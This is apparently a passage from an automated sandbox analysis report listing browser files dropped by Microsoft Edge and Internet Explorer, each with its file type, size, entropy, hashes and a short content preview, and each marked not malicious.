                                                                                                                                              Preview:2025/01/03-11:33:57.432 b3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/03-11:33:57.433 b3c Recovering log #3.2025/01/03-11:33:57.433 b3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):335
                                                                                                                                              Entropy (8bit):5.16906066313061
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVErHW+L+q2PRN23oH+TcwtfrzAdIFUtfEoNKWZmw5EobLVkwORN23oH+Tcwtfa:7VS2i+vaYeb9FUtftKW/5/V5JYeb2J
                                                                                                                                              MD5:3725937080CEE690B694264481DA950B
                                                                                                                                              SHA1:B472835568952ABB34ED7E83CCC0BE7513E40123
                                                                                                                                              SHA-256:C8D25DE9F28F8A8C9E14FBB08BDD8BA849FC45CF532120DF8E5A8FD72A12023A
                                                                                                                                              SHA-512:EED10E5F9C53914B3C54EED96991D77E316C155166948D995DD2A8C5EC96DB17208A9327EE3E28F80BA3BBD082206F3B9C84C2635A30AF13B955CF7CCC0CC2E5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.432 b3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/03-11:33:57.433 b3c Recovering log #3.2025/01/03-11:33:57.433 b3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):120
                                                                                                                                              Entropy (8bit):3.32524464792714
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                              MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                              SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                              SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                              SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):13
                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:117.0.2045.47
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):58109
                                                                                                                                              Entropy (8bit):6.106332299482327
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:k/Ps+wsI7yOmi+EeTTvqrvctoYKBuSZ+aoo:k/0+zI7yOb+EGTivOKBuWNP
                                                                                                                                              MD5:CC63572D87F7727A31456F7A23D15476
                                                                                                                                              SHA1:A4D2AEA081C41C127B5CFDD22BC5F8DF91912872
                                                                                                                                              SHA-256:15A79C25CC3956DB759D2C1A88577A145DAB161D7924ACB16DB26110D296DDA0
                                                                                                                                              SHA-512:DA47A43A5FCC1EC9BA401156A8B629909A46A7F2AA346EEF30BAD24CC9395E9D184F00814FF67D5D1A157AB5D7506DCBE73BFA7445E3F3C2F98121A2D3065E05
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"8ABCE35666CBACA121128B98C75E78308AAC1CE803625FAFB4A7AFA722C77CA4\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):58109
                                                                                                                                              Entropy (8bit):6.106332299482327
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:k/Ps+wsI7yOmi+EeTTvqrvctoYKBuSZ+aoo:k/0+zI7yOb+EGTivOKBuWNP
                                                                                                                                              MD5:CC63572D87F7727A31456F7A23D15476
                                                                                                                                              SHA1:A4D2AEA081C41C127B5CFDD22BC5F8DF91912872
                                                                                                                                              SHA-256:15A79C25CC3956DB759D2C1A88577A145DAB161D7924ACB16DB26110D296DDA0
                                                                                                                                              SHA-512:DA47A43A5FCC1EC9BA401156A8B629909A46A7F2AA346EEF30BAD24CC9395E9D184F00814FF67D5D1A157AB5D7506DCBE73BFA7445E3F3C2F98121A2D3065E05
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"8ABCE35666CBACA121128B98C75E78308AAC1CE803625FAFB4A7AFA722C77CA4\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):47
                                                                                                                                              Entropy (8bit):4.3818353308528755
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                              MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                              SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                              SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                              SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):35
                                                                                                                                              Entropy (8bit):4.014438730983427
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                              MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                              SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                              SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                              SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"forceServiceDetermination":false}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):81
                                                                                                                                              Entropy (8bit):4.3439888556902035
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                              MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                              SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                              SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                              SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):130439
                                                                                                                                              Entropy (8bit):3.80180718117079
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                              MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                              SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                              SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                              SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40
                                                                                                                                              Entropy (8bit):4.346439344671015
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                              MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                              SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                              SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                              SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:synchronousLookupUris_638343870221005468
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):57
                                                                                                                                              Entropy (8bit):4.556488479039065
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                              MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                              SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                              SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                              SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):29
                                                                                                                                              Entropy (8bit):4.030394788231021
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                              MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                              SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                              SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                              SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:topTraffic_638004170464094982
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):575056
                                                                                                                                              Entropy (8bit):7.999649474060713
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                              MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                              SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                              SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                              SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):460992
                                                                                                                                              Entropy (8bit):7.999625908035124
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                              MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                              SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                              SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                              SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):9
                                                                                                                                              Entropy (8bit):3.169925001442312
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:CMzOn:CM6
                                                                                                                                              MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                              SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                              SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                              SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:uriCache_
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):179
                                                                                                                                              Entropy (8bit):4.977476534020899
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YTyLSmafBoTfLYxXOAozRLuLgfGBkGAeekVy8HfzXNPIAclTGSS4yn:YWLSGT8xXOAo9LuLgfGBPAzkVj/T8lKp
                                                                                                                                              MD5:1A21E8C8E6784E0E07011D1FF4135451
                                                                                                                                              SHA1:AED4869B9E542A130B82C3998FE5CD24B4AFE13B
                                                                                                                                              SHA-256:D64942F1B57F11F31562FDAB4B6F4F393A9FDBF17F7FB86BB15F73D6A9D9237A
                                                                                                                                              SHA-512:8CDE31C3AAB6C579650DCC1FDEB936529BC9FE4E898E31C3F21F267BA9D6A9E154A0F8B0999C92A199D24BDFBDD1AA3C0E2D6A4E8C58053E9AAFC49C7498E5C8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"version":1,"cache_data":[{"file_hash":"132fff020070e124","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736022839427496}]}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):86
                                                                                                                                              Entropy (8bit):4.3751917412896075
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQHn:YQ3Kq9X0dMgAEwjFn
                                                                                                                                              MD5:E9E365607374115B92E4ABE4B9628101
                                                                                                                                              SHA1:D5054EA9B22317DCA83801EB3586017BFCC0E2A8
                                                                                                                                              SHA-256:5CD2C4D9F13524923046198C92213691539407E04FA520CDAE9EADE1BAD3D91D
                                                                                                                                              SHA-512:A84D65ED53E43883E5ECB7848FBD48F5305A63E6975E6AF480CF85532879720061106BE54F2A5888EBC3569F7123081A0E6EB48CCB8D7DBA3E1DA1C8A3C50401
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":3}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):48319
                                                                                                                                              Entropy (8bit):6.096312197391174
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:PMkbJrT8IeQc5dKUd7hfgMb2ITEeTT5oFAqMCoijMYxhJ1vvIBL5uTY3JxChoy:PMk1rT8H1Kki+EeTTvqrvcBFuTAaoy
                                                                                                                                              MD5:312F1964E8B3D4C6E3660B9D7F36C704
                                                                                                                                              SHA1:D29F46A15C9313DA285A463F76DCD5F4B278CB99
                                                                                                                                              SHA-256:2D5B6ECDB2BD3ADA0C66F742D4916CE5D26E21833CDC7F5CFC04C92F5DFF0F8A
                                                                                                                                              SHA-512:0F1A91260C12DDB52B1826BE7857B484862D7527AA28936846AEA134E733FE097884DC672CD96F4BABA87E3B57FCA5B2A6596FA0FEA3367014CA86B9949F854A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735922041"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5632
                                                                                                                                              Entropy (8bit):2.4450916583563966
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:rfW4GMh5GW4GMhDyMh3MhuMhDREyMhVMhuMhHcR8dOlGL8Hlhy:xG6kG6W636u6b6V6u68R8dz8
                                                                                                                                              MD5:5CF19E364549808651B0AEBA35DEB1BC
                                                                                                                                              SHA1:509D4F9D034803328A70D00DE442FD1012E8DB6A
                                                                                                                                              SHA-256:98677E1E1D9640439D5FB0D260FE0710C88E6B9DC41455D00D3C24CE8FEE923B
                                                                                                                                              SHA-512:CF57F0F615708749339B07AE444B7647C42ECD66246E164DED9392F2199CEF4EE79933A245FC8A07245B435916FAEB92E929E569DB4D0EC615B1EC4EC6A6298B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................`..F.]................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................0.......O._.T.S.b.0.2.t.e.P.D.J.7.x.G.M.L.u.z.0.u.#.8.l.i.g.=.=.........:.......................................
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4096
                                                                                                                                              Entropy (8bit):1.722000963088757
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:rl0oXGFiBXDrEgm8Gf76FzlXDrEgm8Gn7qw9lgOjg0tN/9lLahd0tMC:r5VG8HlTG8m9l28B9la8M
                                                                                                                                              MD5:FCA1F6BD40E44CE8C614C20184F35071
                                                                                                                                              SHA1:AF64DBB65BC9A635501232350DA5907E562F6ABE
